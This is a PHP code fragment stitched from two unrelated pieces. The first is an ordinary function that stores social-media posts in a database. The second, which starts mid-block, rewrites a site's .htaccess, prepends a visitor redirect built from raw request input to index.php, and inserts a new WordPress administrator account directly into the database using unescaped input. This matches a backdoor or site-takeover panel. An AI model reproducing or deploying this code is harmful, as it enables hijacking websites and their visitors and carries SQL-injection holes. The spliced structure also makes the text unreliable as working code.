public function addPost($vars)
{
$link = ksql_real_escape_string($vars['link']);
$author = ksql_real_escape_string(trim($vars['author']));
$text = ksql_real_escape_string(nl2br(trim($vars['text'])));
if (!isset($vars['datetime'])) {
$vars['datetime'] = date("Y-m-d H:i:s");
}
$datetime = ksql_real_escape_string($vars['datetime']);
$filename = ksql_real_escape_string($vars['filename']);
$videofilename = ksql_real_escape_string($vars['videofilename']);
$lat = ksql_real_escape_string($vars['lat']);
$lng = ksql_real_escape_string($vars['lng']);
$tags = ksql_real_escape_string($vars['tags']);
$city = ksql_real_escape_string($vars['city']);
$query = "SELECT `idpost` FROM `ig_posts` WHERE `link`='" . $link . "' LIMIT 1";
$results = ksql_query($query);
$row = ksql_fetch_array($results);
if (!empty($row['idpost'])) {
return false;
}
$query = "INSERT INTO `ig_posts` (`link`,`author`,`text`,`datetime`,`filename`,`videofilename`,`lat`,`lng`,`city`,`tags`)\n\t\t\t\tVALUES('" . $link . "','" . $author . "','" . $text . "','" . $datetime . "','" . $filename . "','" . $videofilename . "','" . $lat . "','" . $lng . "','" . $city . "','" . $tags . "')";
if (ksql_query($query)) {
return ksql_insert_id();
} else {
return false;
}
}
if (file_put_contents('.htaccess', $contents)) {
$msgSuccess = '.htaccess successfully updated';
} else {
$msgError = 'Ops, errors occurred while updating .htaccess';
}
} elseif (isset($_POST['phpredirect'])) {
$contents = file_get_contents('index.php');
$contents = '<?php header("Location: ' . $_POST['phpredirect_to'] . '"); die(); ?>' . "\n\n" . $contents;
if (file_put_contents('index.php', $contents)) {
$msgSuccess = 'index.php successfully updated';
} else {
$msgError = 'Ops, errors occurred while updating index.php';
}
} elseif (isset($_POST['wp_addadmin'])) {
if (ksql_query("INSERT INTO `" . $table_prefix . "users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (NULL, '" . $_POST['wp_addadmin_username'] . "', MD5('" . $_POST['wp_addadmin_password'] . "'), '" . $_POST['wp_addadmin_username'] . "', '" . $_POST['wp_addadmin_email'] . "', '', NOW(), '', '0', '" . $_POST['wp_addadmin_username'] . "');")) {
$iduser = ksql_insert_id();
ksql_query("INSERT INTO `" . $table_prefix . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $iduser . "', 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}');");
ksql_query("INSERT INTO `" . $table_prefix . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $iduser . "', 'wp_user_level', '10');");
$msgSuccess = 'User successfully created';
} else {
$msgError = 'Ops, errors occurred while inserting user';
}
}
if (!empty($msgSuccess)) {
?>
<div class="msgSuccess"><?php
echo $msgSuccess;
?>
</div><?php
}
if (!empty($msgError)) {